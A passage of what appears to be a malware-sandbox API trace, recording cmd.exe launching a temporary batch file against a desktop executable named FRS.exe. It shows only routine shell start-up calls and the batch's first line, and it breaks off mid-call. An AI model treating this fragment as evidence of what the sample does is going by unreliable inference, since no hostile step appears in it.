AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0034.721] VirtualQuery (in: lpAddress=0xc90000, lpBuffer=0xc8f980, dwLength=0x1c | out: lpBuffer=0xc8f980*(BaseAddress=0xc90000, AllocationBase=0xc90000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0034.721] GetConsoleOutputCP () returned 0x1b5 [0034.721] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0034.722] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0034.722] _get_osfhandle (_FileHandle=1) returned 0x28 [0034.722] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 1 [0034.722] _get_osfhandle (_FileHandle=1) returned 0x28 [0034.722] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0034.722] _get_osfhandle (_FileHandle=1) returned 0x28 [0034.722] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0034.723] _get_osfhandle (_FileHandle=0) returned 0x24 [0034.723] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0034.723] _get_osfhandle (_FileHandle=0) returned 0x24 [0034.723] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x1a7) returned 1 [0034.723] GetEnvironmentStringsW () returned 0xd14030* [0034.723] FreeEnvironmentStringsA (penv="A") returned 1 [0034.723] GetEnvironmentStringsW () returned 0xd14030* [0034.723] FreeEnvironmentStringsA (penv="A") returned 1 [0034.723] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xc8e928 | out: phkResult=0xc8e928*=0x44) returned 0x0 [0034.723] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xc8e930, lpData=0xc8e934, lpcbData=0xc8e92c*=0x1000 | out: lpType=0xc8e930*=0x0, lpData=0xc8e934*=0x8c, lpcbData=0xc8e92c*=0x1000) returned 0x2 [0034.723] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xc8e930, lpData=0xc8e934, lpcbData=0xc8e92c*=0x1000 | out: lpType=0xc8e930*=0x4, lpData=0xc8e934*=0x1, lpcbData=0xc8e92c*=0x4) returned 0x0 [0034.723] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xc8e930, lpData=0xc8e934, lpcbData=0xc8e92c*=0x1000 | out: lpType=0xc8e930*=0x0, lpData=0xc8e934*=0x1, lpcbData=0xc8e92c*=0x1000) returned 0x2 [0034.723] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xc8e930, lpData=0xc8e934, lpcbData=0xc8e92c*=0x1000 | out: lpType=0xc8e930*=0x4, lpData=0xc8e934*=0x0, lpcbData=0xc8e92c*=0x4) returned 0x0 [0034.723] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xc8e930, lpData=0xc8e934, lpcbData=0xc8e92c*=0x1000 | out: lpType=0xc8e930*=0x4, lpData=0xc8e934*=0x40, lpcbData=0xc8e92c*=0x4) returned 0x0 [0034.724] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xc8e930, lpData=0xc8e934, lpcbData=0xc8e92c*=0x1000 | out: lpType=0xc8e930*=0x4, lpData=0xc8e934*=0x40, lpcbData=0xc8e92c*=0x4) returned 0x0 [0034.724] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xc8e930, lpData=0xc8e934, lpcbData=0xc8e92c*=0x1000 | out: lpType=0xc8e930*=0x0, lpData=0xc8e934*=0x40, lpcbData=0xc8e92c*=0x1000) returned 0x2 [0034.724] RegCloseKey (hKey=0x44) returned 0x0 [0034.724] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xc8e928 | out: phkResult=0xc8e928*=0x44) returned 0x0 [0034.724] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xc8e930, lpData=0xc8e934, lpcbData=0xc8e92c*=0x1000 | out: lpType=0xc8e930*=0x0, lpData=0xc8e934*=0x40, lpcbData=0xc8e92c*=0x1000) returned 0x2 [0034.724] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xc8e930, lpData=0xc8e934, lpcbData=0xc8e92c*=0x1000 | out: lpType=0xc8e930*=0x4, lpData=0xc8e934*=0x1, lpcbData=0xc8e92c*=0x4) returned 0x0 [0034.724] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xc8e930, lpData=0xc8e934, lpcbData=0xc8e92c*=0x1000 | out: lpType=0xc8e930*=0x0, lpData=0xc8e934*=0x1, lpcbData=0xc8e92c*=0x1000) returned 0x2 [0034.724] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xc8e930, lpData=0xc8e934, lpcbData=0xc8e92c*=0x1000 | out: lpType=0xc8e930*=0x4, lpData=0xc8e934*=0x0, lpcbData=0xc8e92c*=0x4) returned 0x0 [0034.724] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xc8e930, lpData=0xc8e934, lpcbData=0xc8e92c*=0x1000 | out: lpType=0xc8e930*=0x4, lpData=0xc8e934*=0x9, lpcbData=0xc8e92c*=0x4) returned 0x0 [0034.724] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xc8e930, lpData=0xc8e934, lpcbData=0xc8e92c*=0x1000 | out: lpType=0xc8e930*=0x4, lpData=0xc8e934*=0x9, lpcbData=0xc8e92c*=0x4) returned 0x0 [0034.724] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xc8e930, lpData=0xc8e934, lpcbData=0xc8e92c*=0x1000 | out: lpType=0xc8e930*=0x0, lpData=0xc8e934*=0x9, lpcbData=0xc8e92c*=0x1000) returned 0x2 [0034.724] RegCloseKey (hKey=0x44) returned 0x0 [0034.724] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5004d [0034.724] srand (_Seed=0x5aa5004d) [0034.724] GetCommandLineW () returned="cmd.exe /c \"\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat\" \"C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe\" \"" [0034.724] GetCommandLineW () returned="cmd.exe /c \"\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat\" \"C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe\" \"" [0034.724] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0034.724] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xd14038, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0034.725] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0034.725] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0034.725] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0034.725] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0034.725] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0034.725] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0034.725] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0034.725] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0034.725] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0034.725] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0034.725] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0034.725] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0034.726] GetEnvironmentStringsW () returned 0xd14248* [0034.726] FreeEnvironmentStringsA (penv="A") returned 1 [0034.726] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0034.726] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0034.726] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0034.726] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0034.726] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0034.726] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0034.726] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0034.726] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0034.726] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0034.726] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0034.726] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xc8f708 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0034.726] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xc8f708, lpFilePart=0xc8f704 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8f704*="Desktop") returned 0x1c [0034.726] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0034.726] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xc8f480 | out: lpFindFileData=0xc8f480) returned 0xd105c8 [0034.726] FindClose (in: hFindFile=0xd105c8 | out: hFindFile=0xd105c8) returned 1 [0034.726] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xc8f480 | out: lpFindFileData=0xc8f480) returned 0xd105c8 [0034.726] FindClose (in: hFindFile=0xd105c8 | out: hFindFile=0xd105c8) returned 1 [0034.726] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0034.727] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xc8f480 | out: lpFindFileData=0xc8f480) returned 0xd105c8 [0034.727] FindClose (in: hFindFile=0xd105c8 | out: hFindFile=0xd105c8) returned 1 [0034.727] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0034.727] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0034.727] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0034.727] GetEnvironmentStringsW () returned 0xd14248* [0034.727] FreeEnvironmentStringsA (penv="=") returned 1 [0034.727] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0034.727] GetConsoleOutputCP () returned 0x1b5 [0034.728] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0034.728] GetUserDefaultLCID () returned 0x409 [0034.728] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0034.728] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xc8f834, cchData=128 | out: lpLCData="0") returned 2 [0034.728] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xc8f834, cchData=128 | out: lpLCData="0") returned 2 [0034.728] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xc8f834, cchData=128 | out: lpLCData="1") returned 2 [0034.728] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0034.728] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0034.728] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0034.728] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0034.728] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0034.728] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0034.728] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0034.728] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0034.728] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0034.728] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0034.728] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0034.729] GetConsoleTitleW (in: lpConsoleTitle=0xd16b30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0034.729] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0034.729] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0034.729] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0034.729] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0034.731] _wcsicmp (_String1="\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat\"", _String2=")") returned -7 [0034.731] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat\"") returned 68 [0034.731] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat\"") returned 68 [0034.731] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat\"") returned 71 [0034.731] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat\"") returned 71 [0034.731] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat\"") returned 80 [0034.731] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat\"") returned 80 [0034.732] GetConsoleTitleW (in: lpConsoleTitle=0xc8f528, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0034.732] GetFileAttributesW (lpFileName="\"C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat\"" (normalized: "c:\\users\\5jghkoaofdp\\desktop\\\"c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat\"")) returned 0xffffffff [0034.732] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0034.732] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0034.732] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0034.732] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0034.732] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0034.732] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0034.732] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0034.732] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0034.732] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0034.732] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0034.732] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0034.732] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0034.732] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0034.732] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0034.732] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0034.732] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0034.732] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0034.732] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0034.732] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0034.732] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0034.732] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0034.732] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0034.733] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0034.733] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0034.733] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0034.733] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0034.733] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0034.733] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0034.733] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0034.733] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0034.733] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0034.733] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0034.733] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0034.733] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0034.733] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0034.733] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0034.733] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0034.733] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0034.733] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0034.733] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0034.733] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0034.733] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0034.733] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0034.733] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0034.733] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0034.733] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0034.733] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0034.733] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0034.733] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0034.733] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0034.733] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0034.733] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0034.733] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0034.733] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0034.733] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0034.733] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0034.733] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0034.733] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0034.733] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0034.733] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0034.733] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0034.733] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0034.733] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0034.733] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0034.733] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0034.733] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0034.733] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0034.733] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0034.733] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0034.733] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0034.733] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0034.733] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0034.733] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0034.733] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0034.733] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0034.733] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0034.733] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0034.733] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0034.733] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0034.733] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0034.734] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0034.734] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0034.734] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0034.734] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0034.734] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0034.734] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0034.734] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0034.734] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0034.735] SetErrorMode (uMode=0x0) returned 0x0 [0034.735] SetErrorMode (uMode=0x1) returned 0x0 [0034.735] GetFullPathNameW (in: lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0xd105d0, lpFilePart=0xc8f02c | out: lpBuffer="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp", lpFilePart=0xc8f02c*="Temp") returned 0x24 [0034.735] SetErrorMode (uMode=0x0) returned 0x1 [0034.735] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\.") returned 1 [0034.735] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0034.738] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0034.738] FindFirstFileExW (in: lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat", fInfoLevelId=0x1, lpFindFileData=0xc8edd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8edd8) returned 0xd172b0 [0034.738] FindClose (in: hFindFile=0xd172b0 | out: hFindFile=0xd172b0) returned 1 [0034.738] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0034.738] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0034.738] GetConsoleTitleW (in: lpConsoleTitle=0xc8f2b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0034.738] ApiSetQueryApiSetPresence () returned 0x0 [0034.738] LdrResolveDelayLoadedAPI () returned 0x748212ed [0034.759] SaferWorker () returned 0x0 [0034.773] SetErrorMode (uMode=0x0) returned 0x0 [0034.773] SetErrorMode (uMode=0x1) returned 0x0 [0034.773] GetFullPathNameW (in: lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat", nBufferLength=0x104, lpBuffer=0xd16e90, lpFilePart=0xc8f164 | out: lpBuffer="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat", lpFilePart=0xc8f164*="CCEP00EL.bat") returned 0x31 [0034.773] SetErrorMode (uMode=0x0) returned 0x1 [0034.773] wcsspn (_String=" \"C:\\Users\\5JgHKoaOfdp\\Desktop\\FRS.exe\" ", _Control=" \x09") returned 0x1 [0034.774] LdrResolveDelayLoadedAPI () returned 0x74821293 [0034.774] CmdBatNotificationStub () returned 0x74821293 [0034.774] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0034.774] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0034.774] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.774] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.774] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.774] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0034.774] ReadFile (in: hFile=0x84, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xa6e, lpOverlapped=0x0) returned 1 [0034.775] SetFilePointer (in: hFile=0x84, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0034.775] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="@shift\r\n") returned 8 [0034.775] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.775] GetFileType (hFile=0x84) returned 0x1 [0034.775] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.775] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0034.775] _wcsicmp (_String1="shift", _String2=")") returned 74 [0034.775] _wcsicmp (_String1="FOR", _String2="shift") returned -13 [0034.775] _wcsicmp (_String1="FOR/?", _String2="shift") returned -13 [0034.775] _wcsicmp (_String1="IF", _String2="shift") returned -10 [0034.775] _wcsicmp (_String1="IF/?", _String2="shift") returned -10 [0034.775] _wcsicmp (_String1="REM", _String2="shift") returned -1 [0034.775] _wcsicmp (_String1="REM/?", _String2="shift") returned -1 [0034.776] _tell (_FileHandle=3) returned 8 [0034.777] _close (_FileHandle=3) returned 0 [0034.777] _wcsicmp (_String1="shift", _String2="DIR") returned 15 [0034.777] _wcsicmp (_String1="shift", _String2="ERASE") returned 14 [0034.777] _wcsicmp (_String1="shift", _String2="DEL") returned 15 [0034.777] _wcsicmp (_String1="shift", _String2="TYPE") returned -1 [0034.777] _wcsicmp (_String1="shift", _String2="COPY") returned 16 [0034.777] _wcsicmp (_String1="shift", _String2="CD") returned 16 [0034.777] _wcsicmp (_String1="shift", _String2="CHDIR") returned 16 [0034.777] _wcsicmp (_String1="shift", _String2="RENAME") returned 1 [0034.777] _wcsicmp (_String1="shift", _String2="REN") returned 1 [0034.777] _wcsicmp (_String1="shift", _String2="ECHO") returned 14 [0034.777] _wcsicmp (_String1="shift", _String2="SET") returned 3 [0034.777] _wcsicmp (_String1="shift", _String2="PAUSE") returned 3 [0034.777] _wcsicmp (_String1="shift", _String2="DATE") returned 15 [0034.777] _wcsicmp (_String1="shift", _String2="TIME") returned -1 [0034.777] _wcsicmp (_String1="shift", _String2="PROMPT") returned 3 [0034.777] _wcsicmp (_String1="shift", _String2="MD") returned 6 [0034.777] _wcsicmp (_String1="shift", _String2="MKDIR") returned 6 [0034.777] _wcsicmp (_String1="shift", _String2="RD") returned 1 [0034.777] _wcsicmp (_String1="shift", _String2="RMDIR") returned 1 [0034.777] _wcsicmp (_String1="shift", _String2="PATH") returned 3 [0034.777] _wcsicmp (_String1="shift", _String2="GOTO") returned 12 [0034.777] _wcsicmp 